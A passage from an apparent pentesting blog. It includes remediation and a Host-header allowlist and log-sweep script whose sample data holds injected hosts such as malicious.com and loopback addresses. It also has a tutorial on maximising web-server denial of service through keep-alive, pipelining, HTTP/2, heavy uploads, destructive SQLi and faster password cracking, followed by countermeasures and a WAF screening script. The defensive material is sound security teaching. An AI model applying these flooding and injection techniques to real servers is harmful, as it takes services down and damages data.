You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. [6]<br />
<br />
More specifically we can:<br />
<br />
<ol>
<li>Apply egress filtering on the DMZ</li>
<li>Apply egress filtering on the host</li>
<li>Apply whitelist IP restrictions in the app</li>
<li>Apply blacklist restrictions in the app (although not recommended)</li>
</ol>
</div>
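One way to implement the whitelist and host integrity check recommended above, together with a sweep of access logs for the injected Host values seen earlier in the post, as an added Python example that is not code from the original post. The allowed hostnames and ports, the simplified log format and the log lines themselves are constructed for the example; only the Host values mirror the requests shown above.

```python
"""Host header allowlist check plus a log sweep for injected Host values.

Added example, not code from the original post. ALLOWED_HOSTS, ALLOWED_PORTS,
the log format and SAMPLE_LOG are constructed for the example; the Host
values mirror the requests discussed above (malicious.com, 127.0.0.1:8080,
192.168.1.x, the Collaborator hostname).
"""
import ipaddress
import re

# Names the application is really served under (assumed for the example).
ALLOWED_HOSTS = {"our_vulnerableapp.com", "www.our_vulnerableapp.com"}
ALLOWED_PORTS = {80, 443}

# host[:port]; host is a bracketed IPv6 literal or a DNS-style name / IPv4 literal.
_HOST_RE = re.compile(
    r"^(?P<host>\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9._-]+)(?::(?P<port>\d{1,5}))?$"
)
# Simplified access-log line: client ip, quoted Host header, quoted request line, status.
_LOG_RE = re.compile(r'^(?P<client>\S+) "(?P<host>[^"]*)" "(?P<req>[^"]*)" (?P<status>\d{3})$')


def split_host(value):
    """Return (hostname, port or None) from a Host header value, or None if malformed."""
    m = _HOST_RE.match(value.strip())
    if not m:
        return None
    port = int(m.group("port")) if m.group("port") else None
    if port is not None and not 0 < port < 65536:
        return None
    return m.group("host").lower(), port


def _as_ip(host):
    """The address object if host is an IP literal (IPv4 or bracketed IPv6), else None."""
    try:
        return ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return None


def classify_host(value):
    """Label a Host value: 'ok' or the reason it must be rejected.

    IP literals are refused outright, because a legitimate client reaches us
    by name; splitting loopback / internal / external makes the intent visible
    in alerts (localhost scan vs. DMZ scan vs. third-party bounce).
    """
    parsed = split_host(value)
    if parsed is None:
        return "malformed"
    host, port = parsed
    ip = _as_ip(host)
    if ip is not None:
        if ip.is_loopback:
            return "loopback"
        if ip.is_private:
            return "internal-ip"
        return "external-ip"
    if host not in ALLOWED_HOSTS:
        return "unknown-host"
    if port is not None and port not in ALLOWED_PORTS:
        return "unexpected-port"
    return "ok"


def host_header_ok(value):
    """The allowlist decision: serve the request only when Host is one of ours."""
    return classify_host(value) == "ok"


def sweep_log(text):
    """Return a list of (client, host, reason) for every logged request whose Host is not ours."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue  # a line in another format is skipped, not mis-classified
        reason = classify_host(m.group("host"))
        if reason != "ok":
            hits.append((m.group("client"), m.group("host"), reason))
    return hits


# Constructed log sample; 203.0.113.10 is a documentation address standing in for the tester.
SAMPLE_LOG = """\
203.0.113.10 "our_vulnerableapp.com" "GET / HTTP/1.1" 200
203.0.113.10 "malicious.com" "GET / HTTP/1.1" 302
203.0.113.10 "127.0.0.1:8080" "GET / HTTP/1.1" 200
203.0.113.10 "192.168.1.7" "GET / HTTP/1.1" 200
203.0.113.10 "edgfsdg2zjqjx5dwcbnngxm62pwykabg24r.burpcollaborator.net" "GET / HTTP/1.1" 200
203.0.113.10 "our_vulnerableapp.com:8443" "GET / HTTP/1.1" 200
"""

if __name__ == "__main__":
    for client, host, reason in sweep_log(SAMPLE_LOG):
        print(f"{client} sent Host={host!r}: {reason}")
```

Run against a real access log, the sweep only needs `_LOG_RE` adapted to the server's log format; the classification and the allowlist decision stay the same.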
<div style="text-align: justify;">
<b>References:</b></div>
<div style="text-align: justify;">
<ol>
<li><a href="https://portswigger.net/kb/issues/00300200_external-service-interaction-dns">https://portswigger.net/kb/issues/00300200_external-service-interaction-dns</a></li>
<li><a href="https://tools.ietf.org/html/rfc2616">https://tools.ietf.org/html/rfc2616</a></li>
<li><a href="https://portswigger.net/burp/documentation/collaborator">https://portswigger.net/burp/documentation/collaborator</a></li>
<li><a href="https://portswigger.net/burp/documentation/desktop/tools/intruder/using">https://portswigger.net/burp/documentation/desktop/tools/intruder/using</a></li>
<li><a href="https://owasp.org/www-community/attacks/Cache_Poisoning">https://owasp.org/www-community/attacks/Cache_Poisoning</a></li>
<li><a href="https://portswigger.net/kb/issues/00100a00_out-of-band-resource-load-http">https://portswigger.net/kb/issues/00100a00_out-of-band-resource-load-http</a></li>
<li>CWE-918: Server-Side Request Forgery (SSRF)</li>
<li>CWE-406: Insufficient Control of Network Message Volume (Network Amplification)</li>
<li><a href="https://www.cloudflare.com/learning/ssl/what-is-sni/" style="text-align: start;">https://www.cloudflare.com/learning/ssl/what-is-sni/</a></li>
</ol>
</div>
<h2>Web DDoSPedia a million requests</h2>
<div>Published 2019-07-23, updated 2020-06-19</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Web Application Denial of Service Next Level</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
In this tutorial we are going to talk about how to cause <u>maximum downtime</u> (including operational recovery processes) in anything that uses the word Web; this is also known as a Denial of Service attack. Using this knowledge for malicious purposes is not something I recommend or approve of, and I have zero accountability for how you use this knowledge. This is also the reason I am providing countermeasures at the end of the post. </div>
<div style="text-align: justify;">
<b><br /></b>
<b>What Is The Landscape</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
In the past we have seen many Denial of Service attacks, but most of them were not very sophisticated. A very good example would be the Low Orbit Ion Cannon (LOIC). LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.[2]</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
All these attacks, as stated in a previous post, do not really take advantage of the layer-7 complexity of the Web and therefore are not as effective as they could be. A very good post exists on the Cloudflare blog named Famous DDoS Attacks [3]. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A few of the famous attacks are:</div>
<div style="text-align: justify;">
</div>
<ul>
<li>The 2016 Dyn attack</li>
<li>The 2015 GitHub attack</li>
<li>The 2013 Spamhaus attack</li>
<li>The 2000 Mafiaboy attack</li>
<li>The 2007 Estonia attack</li>
</ul>
<b>Improving DoS and DDoS attacks</b><br />
<div style="text-align: justify;">
<br />
In order to improve or understand better what is possible while conducting a DoS attack, we have to <span style="color: red;">think like a Web Server, be a Web Server, breathe like a Web Server!!</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVxesD5f7jv_IouWswjHg4LdR8urS5HQdfFNJu63j5VRolDPB5XIZpJ4PMbjosQjE0aWLnnsX3mr0slfoaPgUd9xBoqp9ZimzrU2PbgUoC7zLQzzwOVwbNeJTju0tLkD9qo81jawGtv0o/s1600/c8bf354d464d1e619bfd0baf02abe8f5.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="564" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVxesD5f7jv_IouWswjHg4LdR8urS5HQdfFNJu63j5VRolDPB5XIZpJ4PMbjosQjE0aWLnnsX3mr0slfoaPgUd9xBoqp9ZimzrU2PbgUoC7zLQzzwOVwbNeJTju0tLkD9qo81jawGtv0o/s400/c8bf354d464d1e619bfd0baf02abe8f5.jpg" width="273" /></a></div>
<br />
Well, what does a server breathe? But of course HTTP, so what if we make the Web Server start breathing a lot of HTTP/S? That would be amazing.<br />
<br />
This is how we can overdose a web server with HTTP:<br />
<ol>
<li>HTTP Connection reuse</li>
<li>HTTP Pipelining</li>
<li>Single SSL/TLS handshake </li>
</ol>
But let's go a step further and expand on that: what else can we do to increase the impact? But of course <b>profile the server</b> and adjust the traffic to something that can be processed, e.g. abuse vulnerable file upload functionality, SQLi attacks with drop statements etc.<br />
<br />
<b> HTTP connection reuse</b><br />
<br />
HTTP persistent connection, also called HTTP keep-alive, or HTTP connection reuse, is the idea of using <b>a single TCP connection</b> to send and receive multiple HTTP requests/responses, as opposed to opening a new connection for every single request/response pair.<br />
<br />
The newer HTTP/2 protocol uses the same idea and takes it further to allow multiple concurrent requests/responses to be multiplexed over a single connection.<br />
<br />
<u>In HTTP 1.0, connections are not considered persistent unless a keep-alive header is included</u>, although there is no official specification for how keepalive operates. It was, in essence, added to an existing protocol. If the client supports keep-alive, it adds an additional header to the request:<br />
<blockquote class="tr_bq">
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); font-family: monospace, monospace; font-size: 14px; line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start; white-space: pre-wrap;">Connection: keep-alive</pre>
</blockquote>
Then, when the server receives this request and generates a response, it also adds a header to the response:<br />
<blockquote class="tr_bq">
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); font-family: monospace, monospace; font-size: 14px; line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start; white-space: pre-wrap;">Connection: keep-alive</pre>
</blockquote>
Following this, the connection is not dropped, but is instead kept open. When the client sends another request, it uses the same connection. This will continue until either the client or the server decides that the conversation is over, and one of them drops the connection.<br />
<br />
<span style="color: red;"><b>In HTTP 1.1, all connections are considered persistent unless declared otherwise</b>.</span> The HTTP persistent connections do not use separate keepalive messages, they just allow multiple requests to use a single connection.<br />
<br />
<span style="background-color: yellow;">If the client does not close the connection when all of the data it needs has been received, the resources needed to keep the connection open on the server will be unavailable for other clients. How much this affects the server's availability and how long the resources are unavailable depend on the server's architecture and configuration.</span><br />
<span style="background-color: yellow;"><br /></span>
<span style="background-color: white;">Yes dear reader, I know what you are thinking: how can you, the humble hacker, the humble whitehat reader, use this knowledge to bring down your home web server for fun? Well, there is good news. </span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">In Python t</span>here are various functions provided for instantiating HTTP keep-alive connections within the urllib3 library, such as connection pools.<br />
<br />
Here is a code chunk to look through:<br />
<br />
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); font-family: monospace, monospace; font-size: 14px; line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start; white-space: pre-wrap;">from urllib3 import HTTPConnectionPool

[...omitted...]

urllib3.connectionpool.make_headers(keep_alive=None, accept_encoding=None, user_agent=None, basic_auth=None)

[...omitted...]</pre>
<div style="text-align: start;">
<br /></div>
Parameters:<br />
<ul>
<li>keep_alive – If True, adds ‘connection: keep-alive’ header.</li>
<li>accept_encoding – Can be a boolean, list, or string. True translates to ‘gzip,deflate’. List will get joined by comma. String will be used as provided.</li>
<li>user_agent – String representing the user-agent you want, such as “python-urllib3/0.6”</li>
<li>basic_auth – Colon-separated username:password string for ‘authorization: basic ...’ auth header.</li>
</ul>
<b>Note:</b> If you are a proxy person, you can use the Match and Replace functionality in Burp Suite Pro to add or replace the keep-alive header. But then your client (aka the browser) would have to know how to handle the received content. It is better to write a Python template to handle the interaction.<br />
<br />
<b>HTTP Pipelining</b></div>
<div style="text-align: justify;">
<br />
HTTP pipelining is a technique in which multiple HTTP requests are sent on a single TCP (transmission control protocol) <span style="color: red;">connection without waiting for the corresponding responses. </span>The technique was superseded by multiplexing via HTTP/2, which is supported by most modern browsers.<br />
<br />
See the following diagram for pipelining:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjOWZawZW0K2vuUeUiKkPGwpg2OmLpZ0VahWo5WqHrAW4V4lKQ80sduAuXYlDy9w1zPjyCVo5fEXQ0FT9pE8eL1Zef8ciaUUD_1iy82c2dnKR5yZjluS3oYATYW7FdhNPrhgHf9unpU-k/s1600/XS-U8gZ-oONKS2fSxqbfLxBwslkQnBbVvude.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="445" data-original-width="640" height="443" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjOWZawZW0K2vuUeUiKkPGwpg2OmLpZ0VahWo5WqHrAW4V4lKQ80sduAuXYlDy9w1zPjyCVo5fEXQ0FT9pE8eL1Zef8ciaUUD_1iy82c2dnKR5yZjluS3oYATYW7FdhNPrhgHf9unpU-k/s640/XS-U8gZ-oONKS2fSxqbfLxBwslkQnBbVvude.png" width="640" /></a></div>
<br />
<br />
<span style="color: red;">HTTP pipelining requires both the client and the server to support it.</span> HTTP/1.1 conforming servers are required to support pipelining (Pipelining was introduced in HTTP/1.1 and was not present in HTTP/1.0). This does not mean that servers are required to pipeline responses, but that they are required not to fail if a client chooses to pipeline requests. Interesting behavior!!!!!!!!!<br />
<br />
<b>Note:</b> Most of the servers execute requests from pipelining clients in the same fashion they would from non-pipelining clients. They don’t try to optimize it.<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgziTYszF8yIDlyvVO01gEPyNaVISdqegjgXly2baYc_OIGvtQelKdf4kal4mYUbQCSFWnlC5MtGFMetbeabDCoWareT9rEVG27X5MEu5N51N1eI2bO9fiKeQJVMafWr7K3nc1wY4EXqSs/s1600/images.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="183" data-original-width="275" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgziTYszF8yIDlyvVO01gEPyNaVISdqegjgXly2baYc_OIGvtQelKdf4kal4mYUbQCSFWnlC5MtGFMetbeabDCoWareT9rEVG27X5MEu5N51N1eI2bO9fiKeQJVMafWr7K3nc1wY4EXqSs/s400/images.jpeg" width="400" /></a></div>
<b><br /></b>
Again, yes dear reader, I know what you are thinking: how can you, the humble blackhat hacker, the humble hacktivist reader, use this knowledge to bring down your home web server for fun? Well, there is more good news.<br />
<span style="background-color: white;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwz1_jfa4hIaTLvjBGz74h4WQrtRR6O1bIF1gbCuWUaH1OnQ9MHSsa7NLPqEihasXN5HdWTj1mPisd2s5Ji8vHk82Hb5Pdnl4vlGEX3BvOP048l3ZUJ_sD3cedduQgrjGJr6ifOtxHFmU/s1600/Funny-Beyonce-want-the-precious.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="510" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwz1_jfa4hIaTLvjBGz74h4WQrtRR6O1bIF1gbCuWUaH1OnQ9MHSsa7NLPqEihasXN5HdWTj1mPisd2s5Ji8vHk82Hb5Pdnl4vlGEX3BvOP048l3ZUJ_sD3cedduQgrjGJr6ifOtxHFmU/s400/Funny-Beyonce-want-the-precious.jpg" width="382" /></a></div>
<span style="background-color: white;"><br /></span>
Some Python frameworks do support HTTP/2 (whose stream multiplexing is the successor of HTTP pipelining), Mouxaxaxa. As of late 2017 there are two Python frameworks that directly support HTTP/2, namely Twisted and Quart, with only the latter supporting server push.<br />
<br />
Quart can be installed via pipenv or pip:<br />
<br />
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">$ pipenv install quart
$ pip install quart</span></span><span style="font-family: monospace, monospace; font-size: 14px; white-space: pre-wrap;">
</span></pre>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
This requires Python 3.7.0 or higher (see the Quart documentation on Python version support for the reasoning).</div>
<div style="text-align: start;">
<div>
<br /></div>
<div>
A minimal Quart example is:</div>
<div>
<br /></div>
<div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">from quart import make_response, Quart, render_template, url_for

app = Quart(__name__)


@app.route('/')
async def index():
    result = await render_template('index.html')
    response = await make_response(result)
    # HTTP/2 server push: the static assets are pushed along with the HTML
    response.push_promises.update([
        url_for('static', filename='css/bootstrap.min.css'),
        url_for('static', filename='js/bootstrap.min.js'),
        url_for('static', filename='js/jquery.min.js'),
    ])
    return response


if __name__ == '__main__':
    # TLS is needed because browsers only negotiate HTTP/2 over TLS
    app.run(
        host='localhost',
        port=5000,
        certfile='cert.pem',
        keyfile='key.pem',
    )</span></span></pre>
</div>
</div>
<b><br /></b>
Another library that supports HTTP/2 connectivity from Python is hyper. hyper is a Python HTTP/2 library, as well as a very serviceable HTTP/1.1 library.<br />
<br />
To begin, you will need to install hyper. This can be done like so:<br />
<b><br /></b>
<br />
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">$ pip install hyper</span></span></pre>
<br />
From the Python interactive shell you can issue a request by typing:<br />
<br />
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">>>> from hyper import HTTPConnection
>>> c = HTTPConnection('http2bin.org')
>>> c.request('GET', '/')
1
>>> resp = c.get_response()</span></span></pre>
<b><br /></b>
Used in this way, hyper behaves exactly like the classic Python http.client. You can make sequential requests using the exact same API you’re accustomed to. The only difference is that HTTPConnection.request() may return a value, unlike the equivalent http.client function. If present, the <span style="color: red;">return value is the HTTP/2 stream identifier.</span><br />
<b><br /></b>
In HTTP/2, a connection is divided into multiple streams (multiplexing, the HTTP/2 successor of pipelining). Each stream carries a single request-response pair. You may start multiple requests before reading the response from any of them, and switch between them using their stream IDs.<br />
<b><br /></b>
<b>Note: </b>Be warned: hyper is in a very early alpha. You will encounter bugs when using it. If you use the library, provide feedback about potential issues to the creator.<br />
<br />
<b>Making Sense</b><br />
<br />
By dramatically increasing the number of payloads per second sent to the server we increase the chance of crashing the system, for the following reasons:<br />
<ul>
<li>Multiple HTTP/2 connections sending requests such as the following would cause significant resource allocation, both in the server and the database:</li>
<ul>
<li>File upload requests, with large files to be uploaded.</li>
<li>File download requests, with large files to be downloaded.</li>
<li>POST and GET requests containing exotic Unicode Encoding e.g. %2e%2e%5c etc.</li>
<li>POST and GET requests while performing intelligent fuzzing. </li>
</ul>
<li>Enforcement of single SSL/TLS Handshake: </li>
<ul>
<li>Not much to be said here. Simply enforce a single TLS handshake if the malicious payloads are going to consume more resources than the handshake itself. This will cause the server to consume resources.</li>
</ul>
</ul>
<div>
<b>Note:</b> This type of attack can also be used as a diversion to hide other types of attacks, such as SQLi.</div>
<br />
The diagram below shows where the system is potentially going to crash first:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiK_8nmylFxl5jSZxUJiAw2VYQOULH8cGYPtYhgWab94gg0eayzCWrHu5OKeCdFmmtRkxIj5o35tfAaNG0U5TJImpGuppJ2CbP4hK1DBQW8Wwxgem9NcH5iTTz3FWfJYpvwFpeQ6Ueoy0/s1600/screenshotcrash.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="841" height="459" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiK_8nmylFxl5jSZxUJiAw2VYQOULH8cGYPtYhgWab94gg0eayzCWrHu5OKeCdFmmtRkxIj5o35tfAaNG0U5TJImpGuppJ2CbP4hK1DBQW8Wwxgem9NcH5iTTz3FWfJYpvwFpeQ6Ueoy0/s640/screenshotcrash.png" width="640" /></a></div>
<br />
<br />
<b>Other Uses of This Tech</b><br />
<b><br /></b>
We can use this knowledge to perform the following tasks:<br />
<ul>
<li>Optimize Web App Scans</li>
<li>Optimize directory enumeration</li>
<li>Optimize online password cracking on Web Forms</li>
<li>Optimize manual SQLi attacks </li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEtynGIF-7zQln33wlG0N5dyBz0GdbbVHWkTBeqQiGUh_iSrbqwHaLPdi2St1hK08p98odsbfFbNVBpnF-0Uhr4QGmDMLxIgafZcKAvjlV2Ra860Q5GZ0SWzD1kKa7yTth6TXpLR3u5uo/s1600/download.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="164" data-original-width="308" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEtynGIF-7zQln33wlG0N5dyBz0GdbbVHWkTBeqQiGUh_iSrbqwHaLPdi2St1hK08p98odsbfFbNVBpnF-0Uhr4QGmDMLxIgafZcKAvjlV2Ra860Q5GZ0SWzD1kKa7yTth6TXpLR3u5uo/s640/download.jpeg" width="640" /></a></div>
<b><br /></b>
<b>Useful Tools </b><br />
<b><br /></b>
There are some tools out there that make use of some of the principles mentioned here:<br />
<ul>
<li>Turbo Intruder - <a href="https://github.com/PortSwigger/turbo-intruder">https://github.com/PortSwigger/turbo-intruder</a> - Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. It's intended to complement Burp Intruder by handling attacks that require exceptional speed, duration, or complexity.</li>
<li>Skipfish - <a href="https://code.google.com/archive/p/skipfish/">https://code.google.com/archive/p/skipfish/</a> - Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes.</li>
</ul>
<div>
<b>Countermeasures</b><br />
<b><br /></b>
Things to do to avoid this type of attack are:<br />
<ul>
<li>Firewall HTTP state filtering rules </li>
<li>Firewall HTTPS state filtering rules </li>
<li>Firewall HTTP/2 blockage - Although not recommended</li>
<li>WAF that checks the following things - </li>
<ul>
<li>User Agent - Check for spoofing the agent </li>
<li>Request Parameters - Check for fuzzing </li>
<li>Request size check.</li>
</ul>
</ul>
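<div>As an added example (not code from the post), here is the server-side view of the pipelining described earlier combined with the WAF checks listed above: it splits one connection's raw input into the pipelined requests it contains, then applies a request-count limit, a request-size limit, a User-Agent presence check and a check for hand-crafted percent-encoding such as the %2e%2e%5c mentioned earlier. The thresholds and the sample byte stream are constructed for the demo; chunked bodies are out of scope.</div>

```python
import re
from urllib.parse import unquote

# Thresholds a WAF or reverse proxy might enforce per TCP connection.
# Constructed for this demo, not taken from any product.
POLICY = {
    "max_pipelined": 2,        # requests accepted in one read without a reply
    "max_request_bytes": 256,  # head + body, per request
}

# RFC 3986 "unreserved" characters never need percent-encoding; a client that
# encodes them anyway (%2e for '.', %5c decodes to '\') is hand-crafting
# requests, which is the "exotic encoding" the post refers to.
UNRESERVED = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~")


def has_exotic_encoding(target: str) -> bool:
    """True if the request target percent-encodes an unreserved character
    or decodes to a '..' path segment (forward or backslash)."""
    for hexpair in re.findall(r"%([0-9A-Fa-f]{2})", target):
        if chr(int(hexpair, 16)) in UNRESERVED:
            return True
    decoded = unquote(target)
    return "../" in decoded or "..\\" in decoded


def split_pipelined_requests(stream: bytes) -> list:
    """Split a raw HTTP/1.1 byte stream holding back-to-back (pipelined)
    requests into dicts. Bodies are sized by Content-Length only."""
    requests, pos = [], 0
    while pos < len(stream):
        start = pos
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            raise ValueError("truncated request head at offset %d" % pos)
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        method, target, version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_len = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        body = stream[body_start:body_start + body_len]
        if len(body) != body_len:
            raise ValueError("truncated body at offset %d" % body_start)
        pos = body_start + body_len
        requests.append({"method": method, "target": target, "version": version,
                         "headers": headers, "body": body, "size": pos - start})
    return requests


def screen_connection(stream: bytes, policy: dict = POLICY) -> list:
    """Apply the countermeasures to one connection's input and return
    (request_index, rule) findings; index -1 means the whole connection."""
    requests = split_pipelined_requests(stream)
    findings = []
    if len(requests) > policy["max_pipelined"]:
        findings.append((-1, "too_many_pipelined_requests"))
    for i, req in enumerate(requests):
        if req["size"] > policy["max_request_bytes"]:
            findings.append((i, "request_too_large"))
        if not req["headers"].get("user-agent"):
            findings.append((i, "missing_user_agent"))
        if has_exotic_encoding(req["target"]):
            findings.append((i, "exotic_percent_encoding"))
    return findings


# Constructed sample: three requests written to the socket without waiting
# for any response (pipelining); the third is hand-crafted with %2e%2e%5c.
SAMPLE_STREAM = (
    b"GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
    b"POST /upload HTTP/1.1\r\nHost: app.example\r\nUser-Agent: Mozilla/5.0\r\n"
    b"Content-Length: 300\r\n\r\n" + b"A" * 300 +
    b"GET /search?q=%2e%2e%5c HTTP/1.1\r\nHost: app.example\r\n\r\n"
)

if __name__ == "__main__":
    for index, rule in screen_connection(SAMPLE_STREAM):
        print(index, rule)
```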
That is it folks, have fun.......<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYbRTX5lzhE0DqtCrE8iTvNI8E5bXuz6VvyzUSxLecC_2KZbz5YAzsnQr0h_UK-QulEbw8jGDpd2RHo7GBuLfJRlMA-yRwy99FwqUisvxk61BIUlR2yGc1uovWfro2Z-Xc3bdq5Z8betQ/s1600/a2db35ef0afc089ca881241f510cb926--old-cartoon-characters-looney-tunes-characters.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="173" data-original-width="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYbRTX5lzhE0DqtCrE8iTvNI8E5bXuz6VvyzUSxLecC_2KZbz5YAzsnQr0h_UK-QulEbw8jGDpd2RHo7GBuLfJRlMA-yRwy99FwqUisvxk61BIUlR2yGc1uovWfro2Z-Xc3bdq5Z8betQ/s1600/a2db35ef0afc089ca881241f510cb926--old-cartoon-characters-looney-tunes-characters.jpg" /></a></div>
<br /></div>
<br />
<b>References: </b></div>
<ol>
<li style="text-align: justify;"> <a href="https://stackoverflow.com/questions/25239650/python-requests-speed-up-using-keep-alive">https://stackoverflow.com/questions/25239650/python-requests-speed-up-using-keep-alive</a></li>
<li style="text-align: justify;"> <a href="https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon">https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon</a></li>
<li style="text-align: justify;"> <a href="https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/">https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/</a></li>
<li style="text-align: justify;"><a href="https://en.wikipedia.org/wiki/HTTP_persistent_connection">https://en.wikipedia.org/wiki/HTTP_persistent_connection</a> </li>
<li style="text-align: justify;"><a href="https://2.python-requests.org/en/master/user/advanced/#keep-alive">https://2.python-requests.org/en/master/user/advanced/#keep-alive</a></li>
<li style="text-align: justify;"><a href="https://urllib3.readthedocs.io/en/1.0.2/pools.html">https://urllib3.readthedocs.io/en/1.0.2/pools.html</a>.</li>
<li style="text-align: justify;"><a href="https://stackoverflow.com/questions/19312545/python-http-client-with-request-pipelining">https://stackoverflow.com/questions/19312545/python-http-client-with-request-pipelining</a></li>
<li style="text-align: justify;"><a href="https://www.freecodecamp.org/news/million-requests-per-second-with-python-95c137af319/">https://www.freecodecamp.org/news/million-requests-per-second-with-python-95c137af319/</a></li>
<li style="text-align: justify;"><a href="https://www.python.org/downloads/">https://www.python.org/downloads/</a></li>
<li style="text-align: justify;"><a href="https://txzone.net/2010/02/python-and-http-pipelining/">https://txzone.net/2010/02/python-and-http-pipelining/</a></li>
<li style="text-align: justify;"><a href="https://gitlab.com/pgjones/quart?source=post_page---------------------------">https://gitlab.com/pgjones/quart?source=post_page---------------------------</a></li>
<li style="text-align: justify;"><a href="https://gitlab.com/pgjones/quart/blob/master/docs/http2_tutorial.rst">https://gitlab.com/pgjones/quart/blob/master/docs/http2_tutorial.rst</a></li>
<li style="text-align: justify;"><a href="https://hyper.readthedocs.io/en/latest/">https://hyper.readthedocs.io/en/latest/</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>
<h2 style="text-align: left;">Hacking "Temporal Locality"</h2>
<div style="text-align: justify;">Published 2019-04-16, updated 2019-05-09.</div>
<div style="text-align: justify;">
<b>Introduction</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The reason for this blog post is to analyse certain types of attacks that relate to cache manipulation and have recently resurfaced in various BlackHat and Defcon presentations. More specifically, we are interested in the following types of attacks:</div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">Web Cache Poisoning Attacks </li>
<li style="text-align: justify;">Web Cache Deception Attacks</li>
</ul>
<div style="text-align: justify;">
<b>About the cache</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
Many people fail to understand what exactly a <i>web cache</i> is, and therefore I am going to invest a lot of time in analysing and explaining what a cache is from a hacker's/security professional's perspective, when conducting a pentest or simply hacking a site.</div>
